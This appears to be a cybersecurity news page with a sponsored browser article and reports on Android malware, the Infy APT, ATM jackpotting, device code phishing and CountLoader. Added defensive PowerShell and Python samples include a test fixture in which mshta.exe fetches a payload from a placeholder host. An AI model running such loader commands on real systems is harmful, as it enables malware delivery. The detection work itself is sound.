U.S. Dismantles E-Note Cryptocurrency Exchange — U.S. authorities seized the servers and infrastructure of the E-Note cryptocurrency exchange (“e-note.com,” “e-note.ws,” and “jabb.mn”) for allegedly laundering more than $70 million from ransomware attacks and account takeover attacks since 2017. No arrests have been announced. In tandem, authorities have also indicted the site’s operator, a 39-year-old Russian national named Mykhalio Petrovich Chudnovets, who is said to have started offering money laundering services to cybercriminals in 2010.

Chudnovets has been charged with one count of conspiracy to launder monetary instruments, which carries a maximum penalty of 20 years in prison. The takedown fits into a broader law enforcement effort aimed at taking down services that allow bad actors to abuse the financial system and cash out ill-gotten proceeds.

🎥 Cybersecurity Webinars

How Zero Trust and AI Catch Attacks With No Files, No Binaries, and No Indicators — Cyber threats are evolving faster than ever, exploiting trusted tools and fileless techniques that evade traditional defenses. This webinar reveals how Zero Trust and AI-driven protection can uncover unseen attacks, secure developer environments, and redefine proactive cloud security—so you can stay ahead of attackers, not just react to them.

Master Agentic AI Security: Learn to Detect, Audit, and Contain Rogue MCP Servers — AI tools like Copilot and Claude Code help developers move fast, but they can also create big security risks if not managed carefully. Many teams don’t know which AI servers (MCPs) are running, who built them, or what access they have. Some have already been hacked, turning trusted tools into backdoors. This webinar shows how to find hidden AI risks, stop shadow API key problems, and take control before your AI systems create a breach.

🔧 Cybersecurity Tools

Tracecat — It is an open-source automation platform designed for security and IT teams that need flexible, scalable workflow orchestration. It combines simple YAML-based integration templates with a no-code interface for building workflows, along with built-in lookup tables and case management. Under the hood, workflows are orchestrated using Temporal to support reliability and scale, making Tracecat suitable for both local experimentation and production environments.

Metis — It is an open-source, AI-powered security code review tool built by Arm’s Product Security Team. It uses large language models to understand code context and logic, helping engineers find subtle security issues that traditional tools often miss. Metis supports multiple languages through plugins, works with different LLM providers, and is designed to reduce review fatigue in large or complex codebases while improving secure coding practices.

Disclaimer: These tools are for learning and research only. They haven’t been fully tested for security. If used the wrong way, they could cause harm. Check the code first, test only in safe places, and follow all rules and laws.

Conclusion

The past week made one point clear: the perimeter is gone, but accountability isn’t. Every device, app, and cloud service now plays a part in defense.

Patching fast, verifying what’s running, and questioning defaults are no longer maintenance tasks — they’re survival skills. As threats grow more adaptive, resilience comes from awareness and speed, not fear. Keep visibility high, treat every update as risk reduction, and remember that most breaches start with something ordinary left unchecked.

Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.

How to Browse the Web More Sustainably With a Green Browser

As the internet becomes an essential part of daily life, its environmental footprint continues to grow. Data centers, constant connectivity, and resource-heavy browsing habits all contribute to energy consumption and digital waste. While individual users may not see this impact directly, the collective effect of everyday browsing is significant. Choosing a browser designed with sustainability in mind is one practical way to reduce that impact, without changing how you work online.

This article explains what eco-friendly browsing means, why it matters, and how a green browser like Wave Browser pairs a modern, secure browsing experience with a mission to help protect our ocean through verified cleanup efforts.

Why Eco-Friendly Browsing Matters

Most people think of environmental impact in terms of transportation, food, or physical products. Digital activity is often overlooked. However:

- Browsers run continuously throughout the day
- Heavy tabs and background processes increase energy usage
- Ads and trackers load unnecessary data
- Inefficient browsing tools consume system resources

Over time, these factors contribute to higher energy demand across devices and infrastructure.

Eco-friendly browsing focuses on reducing unnecessary digital load while keeping the browsing experience efficient, functional, and user-friendly.

What Makes a Browser “Green”?

A green or eco-conscious browser isn’t defined by a single feature. Instead, it combines responsible design choices with transparency and measurable impact.

Key characteristics include:

- Efficient use of system resources
- Built-in tools that reduce excess data loading
- Fewer unnecessary background processes
- A clear commitment to environmental responsibility

Rather than asking users to change their habits, a green browser should fit naturally into everyday browsing.

How Wave Browser Supports Eco-Friendly Browsing

Wave Browser is designed for users who want a modern browsing experience while supporting environmental action. Its approach to eco browsing combines efficient technology with real-world impact, along with AppEsteem-certified software standards.

Reducing Unnecessary Resource Usage

Wave Browser includes built-in tools that help limit excess digital clutter.

Features like free ad blocking (available on Windows, Mac and Android), memory-saving tools, and integrated utilities reduce the need for multiple extensions and background processes. By cutting down on unnecessary data requests and system strain, Wave helps devices run more efficiently, using less energy over time.

Using Built-In Tools Instead of Extra Extensions

Many users install multiple browser extensions to manage everyday tasks. Each extension can introduce additional scripts, permissions, and background activity.

Wave Browser integrates common tools directly into the browser, such as:

- A sidebar for quick access to tools and favorite sites
- Built-in productivity features like split view and reading lists
- Tools for saving and organizing online content directly within the browser

Keeping these tools built into the browser reduces the need for third-party add-ons developed outside the browser’s control, helping maintain a simpler and more predictable browsing environment.

Browsing With Awareness, Not Disruption

Eco-friendly browsing shouldn’t feel restrictive. Wave is designed to feel familiar from the first launch, with clear browser settings and an intuitive interface. Users can:

- Adjust privacy and browsing preferences
- Choose their default search engine
- Manage permissions for unfamiliar sites
- Use Incognito Mode when needed

This balance allows users to browse comfortably while avoiding unnecessary digital noise.

Connecting Everyday Browsing to Real-World Impact

Wave Browser goes beyond digital efficiency by linking browsing activity to verified environmental action. Through a Certified Cleanup Partnership with 4ocean, Wave helps fund the removal of plastic and trash from our ocean, rivers, and coastlines. Users support this effort simply by downloading and using the browser as part of their normal routine, with no special actions required. Cleanup efforts support:

- Professional cleanup crews
- Vessels and equipment
- Cleanup materials and operations

Progress is tracked transparently through the browser homepage and through monthly impact reports shared by Wave, connecting everyday browsing to verified ocean cleanup efforts and a long-term goal of removing 300,000 pounds of trash from our ocean, rivers, and coastlines by 2028.

Eco Browsing Without Changing How You Work

One of the biggest barriers to sustainable technology is friction. If a product requires major behavior changes, adoption drops quickly. Wave Browser is designed to avoid that problem. It works like a modern browser should—efficient, intuitive, and flexible—while supporting more responsible browsing behind the scenes.

Users don’t need to browse differently. They simply browse with more intention built into the tool they already use every day.

Making More Sustainable Choices Online

Eco-friendly browsing isn’t about perfection. It’s about small, practical decisions that scale when adopted by many users.

By choosing a browser that:

- Uses resources efficiently
- Reduces unnecessary digital load
- Supports verified environmental action

users can make a meaningful difference without sacrificing usability or performance. Wave Browser shows how everyday technology can support both productivity and environmental responsibility, one browsing session at a time.

This article is a contributed piece from one of our valued partners.


Android Malware Operations Merge Droppers, SMS Theft, and RAT Capabilities at Scale

Threat actors have been observed leveraging malicious dropper apps masquerading as legitimate applications to deliver an Android SMS stealer dubbed Wonderland in mobile attacks targeting users in Uzbekistan. “Previously, users received ‘pure’ Trojan APKs that acted as malware immediately upon installation,” Group-IB said in an analysis published last week. “Now, adversaries increasingly deploy droppers disguised as legitimate applications. The dropper looks harmless on the surface but contains a built-in malicious payload, which is deployed locally after installation – even without an active internet connection.” Wonderland (formerly WretchedCat), according to the Singapore-headquartered cybersecurity company, facilitates bidirectional command-and-control (C2) communication to execute commands in real-time, allowing for arbitrary USSD requests and SMS theft.

It masquerades as Google Play, or files of other formats, such as videos, photos, and wedding invitations. The financially motivated threat actor behind the malware, TrickyWonders, leverages Telegram as the primary platform to coordinate various aspects of the operation. First discovered in November 2023, it’s also attributed to two dropper malware families that are designed to conceal the primary encrypted payload:

- MidnightDat (first seen on August 27, 2025)
- RoundRift (first seen on October 15, 2025)

Wonderland is mainly propagated using fake Google Play Store web pages, ad campaigns on Facebook, bogus accounts on dating apps, and messaging apps like Telegram, with the attackers abusing stolen Telegram sessions of Uzbek users sold on dark web markets to distribute APK files to victims’ contacts and chats. Once the malware is installed, it gains access to SMS messages and intercepts one-time passwords (OTPs), which the group uses to siphon funds from victims’ bank cards.

Other capabilities include retrieving phone numbers, exfiltrating contact lists, hiding push notifications to suppress security or one-time password (OTP) alerts, and even sending SMS messages from infected devices for lateral movement. However, it’s worth pointing out that sideloading the app first requires users to enable a setting that allows installation from unknown sources. This is accomplished by displaying an update screen that instructs them to “install the update to use the app.” “When a victim installs the APK and provides the permissions, the attackers hijack the phone number and attempt to log into the Telegram account registered with that phone number,” Group-IB said. “If the login succeeds, the distribution process is repeated, creating a cyclical infection chain.” Wonderland represents the latest evolution of mobile malware in Uzbekistan, which has shifted from rudimentary malware such as Ajina.Banker that relied on large-scale spam campaigns to more obfuscated strains like Qwizzserial that were found disguised as seemingly benign media files.

The use of dropper applications is strategic as it causes them to appear harmless and evade security checks. In addition, both the dropper and SMS stealer components are heavily obfuscated and incorporate anti-analysis tricks to make them a lot more challenging and time-consuming to reverse engineer. What’s more, the use of bidirectional C2 communication transforms the malware from a passive SMS stealer to an active remote-controlled agent that can execute arbitrary USSD requests issued by the server. “The supporting infrastructure has also become more dynamic and resilient,” the researchers said.

“Operators rely on rapidly changing domains, each of which is used only for a limited set of builds before being replaced. This approach complicates monitoring, disrupts blacklist-based defenses, and increases the longevity of command and control channels.” The malicious APK builds are generated using a dedicated Telegram bot, which is then distributed by a category of threat actors called workers in exchange for a share of the stolen funds. As part of this effort, each build is associated with its own C2 domains so that any takedown attempt does not bring down the entire attack infrastructure. The criminal enterprise also includes group owners, developers, and vbivers, who validate stolen card information.

This hierarchical structure reflects a new maturation of the financial fraud operation. “The new wave of malware development in the region clearly demonstrates that methods of compromising Android devices are not just becoming more sophisticated – they are evolving at a rapid pace,” Group-IB said. “Attackers are actively adapting their tools, implementing new approaches to distribution, concealment of activity, and maintaining control over infected devices.” The disclosure coincides with the emergence of new Android malware, such as Cellik, Frogblight, and NexusRoute, that are capable of harvesting sensitive information from compromised devices. Cellik, which is advertised on the dark web for a starting price of $150 for one month or for $900 for a lifetime licence, is equipped with real-time screen streaming, keylogging, remote camera/microphone access, data wiping, hidden web browsing, notification interception, and app overlays to steal credentials.

Perhaps the Trojan’s most troubling feature is a one-click APK builder that allows customers to bundle the malicious payload within legitimate Google Play apps for distribution. “Through its control interface, an attacker can browse the entire Google Play Store catalogue and select legitimate apps to bundle with the Cellik payload,” iVerify’s Daniel Kelley said. “With one click, Cellik will generate a new malicious APK that wraps the RAT inside the chosen legitimate app.” Frogblight, on the other hand, has been found to target users in Turkey via SMS phishing messages that trick recipients into installing the malware under the pretext of viewing court documents related to a court case they are purported to be involved in, Kaspersky said. Besides stealing banking credentials using WebViews, the malware can collect SMS messages, call logs, a list of installed apps on the device, and device file system information.

It can also manage contacts and send arbitrary SMS messages. Frogblight is believed to be under active development, with the threat actor behind the tool laying the groundwork for it to be distributed under a malware-as-a-service (MaaS) model. This assessment is based on the discovery of a web panel hosted on the C2 server and the fact that only samples using the same key as the web panel login can be remotely controlled through it. Malware families like Cellik and Frogblight are part of a growing trend of Android malware, wherein even attackers with little to no technical expertise can now run mobile campaigns at scale with minimal effort.

In recent weeks, Android users in India have also been targeted by a malware dubbed NexusRoute that employs phishing portals impersonating the Indian government services to redirect visitors to malicious APKs hosted on GitHub repositories and GitHub Pages, while simultaneously collecting their personal and financial information. The bogus sites are designed to infect Android devices with a fully obfuscated remote access trojan (RAT) that can steal mobile numbers, vehicle data, UPI PINs, OTPs, and card details, as well as harvest extensive data by abusing accessibility services and prompting users to set it as the default home screen launcher. “Threat actors increasingly weaponize government branding, payment workflows, and citizen service portals to deploy financially driven malware and phishing attacks under the guise of legitimacy,” CYFIRMA said. “The malware performs SMS interception, SIM profiling, contact theft, call-log harvesting, file access, screenshot capture, microphone activation, and GPS tracking.” Further analysis of an embedded email address “gymkhana.studio@gmail[.]com” has linked NexusRoute to a broader underground development ecosystem, raising the possibility that it’s part of a professionally maintained, large-scale fraud and surveillance infrastructure.

“The NexusRoute campaign represents a highly mature, professionally engineered mobile cybercrime operation that combines phishing, malware, financial fraud, and surveillance into a unified attack framework,” the company said. “The use of native-level obfuscation, dynamic loaders, automated infrastructure, and centralized surveillance control places this campaign well beyond the capabilities of common scam actors.”

Iranian Infy APT Resurfaces with New Malware Activity After Years of Silence

Threat hunters have discerned new activity associated with an Iranian threat actor known as Infy (aka Prince of Persia), nearly five years after the hacking group was observed targeting victims in Sweden, the Netherlands, and Turkey. “The scale of Prince of Persia’s activity is more significant than we originally anticipated,” Tomer Bar, vice president of security research at SafeBreach, said in a technical breakdown shared with The Hacker News. “This threat group is still active, relevant, and dangerous.” Infy is one of the oldest advanced persistent threat (APT) actors in existence, with evidence of early activity dating all the way back to December 2004, according to a report released by Palo Alto Networks Unit 42 in May 2016 that was also authored by Bar, along with researcher Simon Conant. The group has also managed to remain elusive, attracting little attention, unlike other Iranian hacking crews such as Charming Kitten, MuddyWater, and OilRig.

Attacks mounted by the group have prominently leveraged two strains of malware: a downloader and victim profiler named Foudre that delivers a second-stage implant called Tonnerre to extract data from high-value machines. It’s assessed that Foudre is distributed via phishing emails. The latest findings from SafeBreach have uncovered a covert campaign that has targeted victims across Iran, Iraq, Turkey, India, and Canada, as well as Europe, using updated versions of Foudre (version 34) and Tonnerre (versions 12-18, 50). The latest version of Tonnerre was detected in September 2025.

The attack chains have also witnessed a shift from a macro-laced Microsoft Excel file to embedding an executable within such documents to install Foudre. Perhaps the most notable aspect of the threat actor’s modus operandi is the use of a domain generation algorithm (DGA) to make its command-and-control (C2) infrastructure more resilient. In addition, Foudre and Tonnerre artifacts are known to validate if the C2 domain is authentic by downloading an RSA signature file, which the malware then decrypts using a public key and compares with a locally-stored validation file. SafeBreach’s analysis of the C2 infrastructure has also uncovered a directory named “key” that’s used for C2 validation, along with other folders to store communication logs and the exfiltrated files.

“Every day, Foudre downloads a dedicated signature file encrypted with an RSA private key by the threat actor and then uses RSA verification with an embedded public key to verify that this domain is an approved domain,” Bar said. “The request’s format is: ‘https:///key/.sig.’” Also present in the C2 server is a “download” directory whose current purpose is unknown. It is suspected that it’s used to download and upgrade to a new version. The latest version of Tonnerre, on the other hand, includes a mechanism to contact a Telegram group (named “سرافراز,” meaning “proudly” in Persian) through the C2 server.

The group has two members: a Telegram bot “@ttestro1bot” that’s likely used to issue commands and collect data, and a user with the handle “@ehsan8999100.” While the use of the messaging app for C2 is not uncommon, what’s notable is that the information about the Telegram group is stored in a file named “tga.adr” within a directory called “t” in the C2 server. It’s worth noting that the download of the “tga.adr” file can only be triggered for a specific list of victim GUIDs. Also discovered by the cybersecurity company are other older variants used in Foudre campaigns between 2017 and 2020:

- A version of Foudre camouflaged as Amaq News Finder to download and execute the malware
- A new version of a trojan called MaxPinner that’s downloaded by Foudre version 24 DLL to spy on Telegram content
- A variation of malware called Deep Freeze, similar to Amaq News Finder, that is used to infect victims with Foudre
- An unknown malware called Rugissement

“Despite the appearance of having gone dark in 2022, Prince of Persia threat actors have done quite the opposite,” SafeBreach said. “Our ongoing research campaign into this prolific and elusive group has highlighted critical details about their activities, C2 servers, and identified malware variants in the last three years.” The disclosure comes as DomainTools’ continued analysis of Charming Kitten leaks has painted the picture of a hacking group that functions more like a government department, while running “espionage operations with clerical precision.” The threat actor has also been unmasked as behind the Moses Staff persona.

“APT 35, the same administrative machine that runs Tehran’s long-term credential-phishing operations, also ran the logistics that powered Moses Staff’s ransomware theatre,” the company said. “The supposed hacktivists and the government cyber-unit share not only tooling and targets but also the same accounts-payable system. The propaganda arm and the espionage arm are two products of a single workflow: different ‘projects’ under the same internal ticketing regime.”


U.S. DOJ Charges 54 in ATM Jackpotting Scheme Using Ploutus Malware

The U.S. Department of Justice (DoJ) this week announced the indictment of 54 individuals in connection with a multi-million dollar ATM jackpotting scheme. The large-scale conspiracy involved deploying malware named Ploutus to hack into automated teller machines (ATMs) across the U.S. and force them to dispense cash.

The indicted members are alleged to be part of Tren de Aragua (TdA, Spanish for “the train of Aragua”), a Venezuelan gang designated a foreign terrorist organization by the U.S. State Department. In July 2025, the U.S. government announced sanctions against the group’s head, Hector Rusthenford Guerrero Flores (aka Niño Guerrero), and five other key members for their involvement in the “illicit drug trade, human smuggling and trafficking, extortion, sexual exploitation of women and children, and money laundering, among other criminal activities.” The Justice Department said an indictment returned on December 9, 2025, has charged a group of 22 people for supposedly committing bank fraud, burglary, and money laundering.

Prosecutors also alleged that TdA has leveraged jackpotting schemes to siphon millions of dollars in the U.S. and transfer the ill-gotten proceeds among its members and associates. Another 32 individuals have been charged in a second, related indictment returned on October 21, 2025, accusing them of “one count of conspiracy to commit bank fraud, one count of conspiracy to commit bank burglary and computer fraud, 18 counts of bank fraud, 18 counts of bank burglary, and 18 counts of damage to computers.” If convicted, the defendants could face a maximum penalty of anywhere between 20 and 335 years in prison. “These defendants employed methodical surveillance and burglary techniques to install malware into ATM machines, and then steal and launder money from the machines, in part to fund terrorism and the other far-reaching criminal activities of TDA, a designated Foreign Terrorist Organization,” said Acting Assistant Attorney General Matthew R. Galeotti of the Justice Department’s Criminal Division.

The jackpotting operation is said to have relied on the TdA recruiting an unspecified number of individuals to deploy the malware across the nation. These individuals would then conduct initial reconnaissance to assess external security measures installed at various ATMs and then attempt to open the ATM’s hood to check if they triggered any alarm or a law enforcement response. Following this step, the threat actors would install Ploutus by either replacing the hard drive with one that came preloaded with the malicious program or by connecting a removable thumb drive.

The malware is equipped to issue unauthorized commands associated with the Cash Dispensing Module of the ATM in order to force currency withdrawals. “The Ploutus malware was also designed to delete evidence of malware in an effort to conceal, create a false impression, mislead, or otherwise deceive employees of the banks and credit unions from learning about the deployment of the malware on the ATM,” the DoJ said. “Members of the conspiracy would then split the proceeds in predetermined portions.” Ploutus was first detected in Mexico in 2013. In a 2014 report, Symantec detailed how Windows XP-based ATMs compromised by the malware could be exploited to allow cybercriminals to withdraw cash simply by sending an SMS command.

A subsequent analysis from FireEye (now part of Google Mandiant) in 2017 detailed its ability to control Diebold ATMs and run on various Windows versions. “Once deployed to an ATM, Ploutus-D makes it possible for a money mule to obtain thousands of dollars in minutes,” it explained at the time. “A money mule must have a master key to open the top portion of the ATM (or be able to pick it), a physical keyboard to connect to the machine, and an activation code (provided by the boss in charge of the operation) in order to dispense money from the ATM.” According to the agency, a total of 1,529 jackpotting incidents have been recorded in the U.S. since 2021, with about $40.73 million lost to the international criminal network as of August 2025.

“Many millions of dollars were drained from ATM machines across the United States as a result of this conspiracy, and that money is alleged to have gone to Tren de Aragua leaders to fund their terrorist activities and purposes,” U.S. Attorney Lesley Woods said.

Russia-Linked Hackers Use Microsoft 365 Device Code Phishing for Account Takeovers

A suspected Russia-aligned group has been attributed to a phishing campaign that employs device code authentication workflows to steal victims’ Microsoft 365 credentials and conduct account takeover attacks. The activity, ongoing since September 2025, is being tracked by Proofpoint under the moniker UNK_AcademicFlare. The attacks involve using compromised email addresses belonging to government and military organizations to strike entities within government, think tanks, higher education, and transportation sectors in the U.S. and Europe.

“Typically, these compromised email addresses are used to conduct benign outreach and rapport building related to the targets’ area of expertise to ultimately arrange a fictitious meeting or interview,” the enterprise security company said. As part of these efforts, the adversary claims to share a link to a document that includes questions or topics for the email recipient to review before the meeting. The URL points to a Cloudflare Worker URL that mimics the compromised sender’s Microsoft OneDrive account and instructs the victim to copy the provided code and click “Next” to access the supposed document. However, doing so redirects the user to the legitimate Microsoft device code login URL, where, once the previously provided code is entered, the service generates an access token that can then be recovered by the threat actors to take control of the victim account.

Device code phishing was documented in detail by both Microsoft and Volexity in February 2025, attributing the use of the attack method to Russia-aligned clusters such as Storm-2372, APT29, UTA0304, and UTA0307. Over the past couple of months, Amazon Threat Intelligence and Volexity have warned of continued attacks mounted by Russian threat actors that abuse the device code authentication flow. Proofpoint said UNK_AcademicFlare is likely a Russia-aligned threat actor given its targeting of Russia-focused specialists at multiple think tanks and Ukrainian government and energy sector organizations. Data from the company shows that multiple threat actors, both state-aligned and financially-motivated, have latched onto the phishing tactic to deceive users into giving them access to Microsoft 365 accounts.

This includes an e-crime group named TA2723 that has used salary-related lures in phishing emails to direct users to fake landing pages and trigger device code authorization. The October 2025 campaign is assessed to have been fueled by the ready availability of crimeware offerings like the Graphish phishing kit and red-team tools such as SquarePhish. “Similar to SquarePhish, the tool is designed to be user-friendly and does not require advanced technical expertise, lowering the barrier for entry and enabling even low-skilled threat actors to conduct sophisticated phishing campaigns,” Proofpoint said. “The ultimate objective is unauthorized access to sensitive personal or organizational data, which can be exploited for credential theft, account takeover, and further compromise.” To counter the risk posed by device code phishing, the best option is to create a Conditional Access policy using the Authentication Flows condition to block device code flow for all users.

If that’s not feasible, it’s advised to use a policy that uses an allow-list approach to allow device code authentication for approved users, operating systems, or IP ranges.
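Both policies described above can be created through the Microsoft Graph PowerShell SDK. The following is an added example, not code from Proofpoint or Microsoft; it assumes an existing Connect-MgGraph session with the Policy.ReadWrite.ConditionalAccess scope, and the account, group, location and platform values are placeholders to be replaced with the tenant’s own.

```powershell
# Added example: Conditional Access policies that block the device code flow using the
# Authentication Flows condition (transferMethods = deviceCodeFlow), plus an audit check.
# Object IDs below are placeholders; run Connect-MgGraph -Scopes Policy.ReadWrite.ConditionalAccess first.
Import-Module Microsoft.Graph.Identity.SignIns

$breakGlassAccountId  = '00000000-0000-0000-0000-000000000000'  # placeholder: emergency-access account
$approvedUsersGroupId = '11111111-1111-1111-1111-111111111111'  # placeholder: group allowed to use device code
$approvedLocationId   = '22222222-2222-2222-2222-222222222222'  # placeholder: named location with approved IP ranges
$approvedPlatform     = 'linux'                                 # placeholder: the one OS allowed to use device code

function New-DeviceCodeBlockPolicy {
    # Preferred option from the text: block device code flow for all users, all apps.
    # The policy starts in report-only mode so sign-in logs can be reviewed before enforcing.
    param([string]$DisplayName = 'Block device code flow - all users')

    $body = @{
        displayName   = $DisplayName
        state         = 'enabledForReportingButNotEnforced'   # switch to 'enabled' after review
        conditions    = @{
            users               = @{ includeUsers = @('All'); excludeUsers = @($breakGlassAccountId) }
            applications        = @{ includeApplications = @('All') }
            clientAppTypes      = @('all')
            authenticationFlows = @{ transferMethods = 'deviceCodeFlow' }
        }
        grantControls = @{ operator = 'OR'; builtInControls = @('block') }
    }
    New-MgIdentityConditionalAccessPolicy -BodyParameter $body
}

function New-DeviceCodeAllowListPolicy {
    # Fallback from the text: block device code flow everywhere except for an approved group,
    # an approved platform and an approved IP range. Each of these is an exclusion, so a
    # sign-in matching any one of them falls outside the policy and is not blocked by it.
    param([string]$DisplayName = 'Block device code flow - except approved users, OS and IPs')

    $body = @{
        displayName   = $DisplayName
        state         = 'enabledForReportingButNotEnforced'
        conditions    = @{
            users               = @{
                includeUsers  = @('All')
                excludeUsers  = @($breakGlassAccountId)
                excludeGroups = @($approvedUsersGroupId)
            }
            applications        = @{ includeApplications = @('All') }
            clientAppTypes      = @('all')
            platforms           = @{ includePlatforms = @('all'); excludePlatforms = @($approvedPlatform) }
            locations           = @{ includeLocations = @('All'); excludeLocations = @($approvedLocationId) }
            authenticationFlows = @{ transferMethods = 'deviceCodeFlow' }
        }
        grantControls = @{ operator = 'OR'; builtInControls = @('block') }
    }
    New-MgIdentityConditionalAccessPolicy -BodyParameter $body
}

function Test-DeviceCodeFlowBlocked {
    # Audit helper: $true when at least one *enforced* policy blocks deviceCodeFlow for all users.
    # Report-only policies do not count, which is the point of checking after enabling.
    foreach ($p in (Get-MgIdentityConditionalAccessPolicy -All)) {
        $flows = $p.Conditions.AuthenticationFlows.TransferMethods
        if ($p.State -eq 'enabled' -and
            $flows -match 'deviceCodeFlow' -and
            $p.GrantControls.BuiltInControls -contains 'block' -and
            $p.Conditions.Users.IncludeUsers -contains 'All') {
            return $true
        }
    }
    return $false
}

# Usage: create the preferred policy, review report-only results, then enable and verify.
New-DeviceCodeBlockPolicy
Test-DeviceCodeFlowBlocked
```

Review the report-only sign-in events before switching the policy state to enabled; Test-DeviceCodeFlowBlocked returns $false until an enforced block policy exists.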

Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware

Cybersecurity researchers have disclosed details of a new campaign that has used cracked software distribution sites as a distribution vector for a new version of a modular and stealthy loader known as CountLoader. The campaign “uses CountLoader as the initial tool in a multistage attack for access, evasion, and delivery of additional malware families,” Cyderes Howler Cell Threat Intelligence team said in an analysis. CountLoader was previously documented by both Fortinet and Silent Push, detailing the loader’s ability to push payloads like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. The loader has been detected in the wild since at least June 2025.

The latest attack chain begins when unsuspecting users attempt to download cracked versions of legitimate software like Microsoft Word, which causes them to be redirected to a MediaFire link hosting a malicious ZIP archive, which contains an encrypted ZIP file and a Microsoft Word document with the password to open the second archive. Present within the ZIP file is a renamed legitimate Python interpreter (“Setup.exe”) that has been configured to execute a malicious command to retrieve CountLoader 3.2 from a remote server using “mshta.exe.” To establish persistence, the malware creates a scheduled task that mimics Google by using the name “GoogleTaskSystem136.0.7023.12” along with an identifier-like string. It’s configured to run every 30 minutes for 10 years by invoking “mshta.exe” with a fallback domain. It also checks if CrowdStrike’s Falcon security tool is installed on the host by querying the antivirus list via Windows Management Instrumentation (WMI).

If the service is detected, the persistence command is tweaked to “cmd.exe /c start /b mshta.exe ." Otherwise, it directly reaches out to the URL using "mshta.exe." CountLoader is equipped to profile the compromised host and fetch the next-stage payload. The newest version of the malware adds capabilities to propagate via removable USB drives and execute the malware directly in memory via "mshta.exe" or PowerShell. The complete list of supported features is as follows -

- Download an executable from a provided URL and execute it
- Download a ZIP archive from a provided URL and execute either a Python-based module or an EXE file present within it
- Download a DLL from a provided URL and run it via "rundll32.exe"
- Download an MSI installer package and install it
- Remove a scheduled task used by the loader
- Collect and exfiltrate extensive system information
- Spread via removable media by creating malicious shortcuts (LNK) next to their hidden original counterparts that, when launched, execute the original file and run the malware via "mshta.exe" with a C2 parameter
- Directly launch "mshta.exe" against a provided URL
- Execute a remote PowerShell payload in memory

In the attack chain observed by Cyderes, the final payload deployed by the CountLoader is an information stealer known as ACR Stealer, which is equipped to harvest sensitive data from infected hosts. "This campaign highlights CountLoader's ongoing evolution and increased sophistication, reinforcing the need for proactive detection and layered defense strategies," Cyderes said.
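The scheduled-task persistence described above (a Google-lookalike task name with a version suffix, mshta.exe launched against a remote URL, a 30-minute repetition) lends itself to a simple hunt. The Python below is an added example, not code from Cyderes or the report: it parses task exports in the Windows Task Scheduler XML format (as produced by `schtasks /query /xml`) and reports which of those indicators each task shows. Both task exports embedded in it are constructed for illustration, and the URL in the suspicious one is a placeholder rather than an indicator from the report.

```python
# Added example (not from the Cyderes report): hunt Task Scheduler XML exports
# for the CountLoader persistence pattern. Both exports below are constructed.
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Google-branded task name carrying a Chrome-style four-part version string,
# e.g. GoogleTaskSystem136.0.7023.12 as reported for CountLoader.
GOOGLE_LOOKALIKE = re.compile(r"^\\?Google\w*?\d+\.\d+\.\d+\.\d+$")
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

# Constructed export mimicking the reported task: lookalike name, mshta.exe
# fetching a remote URL through "cmd.exe /c start /b", repeating every 30 minutes.
# The URL is a placeholder, not an indicator from the report.
SUSPICIOUS_TASK_XML = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\GoogleTaskSystem136.0.7023.12</URI></RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT30M</Interval><Duration>P3650D</Duration></Repetition>
      <StartBoundary>2025-06-01T00:00:00</StartBoundary>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>cmd.exe</Command>
      <Arguments>/c start /b mshta.exe http://placeholder.invalid/stage2</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed export of a legitimate-looking Google updater task, for contrast.
BENIGN_TASK_XML = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\GoogleUpdateTaskMachineUA</URI></RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <Repetition><Interval>PT1H</Interval></Repetition>
      <StartBoundary>2025-06-01T00:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</Command>
      <Arguments>/ua /installsource scheduler</Arguments>
    </Exec>
  </Actions>
</Task>"""


def _text(elem, path):
    node = elem.find(path, NS)
    return (node.text or "").strip() if node is not None else ""


def assess_task(task_xml: str) -> list:
    """Return the CountLoader-style indicators found in one task export (empty if none)."""
    root = ET.fromstring(task_xml)
    reasons = []
    name = _text(root, "t:RegistrationInfo/t:URI")
    if GOOGLE_LOOKALIKE.match(name):
        reasons.append(f"google-lookalike task name with version suffix: {name}")
    for exec_ in root.findall("t:Actions/t:Exec", NS):
        cmdline = f"{_text(exec_, 't:Command')} {_text(exec_, 't:Arguments')}".strip()
        if "mshta" in cmdline.lower() and REMOTE_URL.search(cmdline):
            reasons.append(f"mshta.exe launched against a remote URL: {cmdline}")
    for rep in root.findall(".//t:Repetition", NS):
        if _text(rep, "t:Interval") == "PT30M":
            reasons.append("repeats every 30 minutes (PT30M), matching the reported cadence")
    return reasons


if __name__ == "__main__":
    for label, xml_text in (("suspicious", SUSPICIOUS_TASK_XML), ("benign", BENIGN_TASK_XML)):
        print(label, assess_task(xml_text))
```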

“Its ability to deliver ACR Stealer through a multi-stage process starting from Python library tampering to in-memory shellcode unpacking highlights a growing trend of signed binary abuse and fileless execution tactics.”

YouTube Ghost Network Delivers GachiLoader

The disclosure comes as Check Point disclosed details of a new, heavily obfuscated JavaScript malware loader dubbed GachiLoader that’s written in Node.js. The malware is distributed by means of the YouTube Ghost Network, a network of compromised YouTube accounts that engage in malware distribution. “One variant of GachiLoader deploys a second-stage malware, Kidkadi, that implements a novel technique for Portable Executable (PE) injection,” security researchers Sven Rath and Jaromír Hořejší said. “This technique loads a legitimate DLL and abuses Vectored Exception Handling to replace it on-the-fly with a malicious payload.” As many as 100 YouTube videos have been flagged as part of the campaign, amassing approximately 220,000 views.

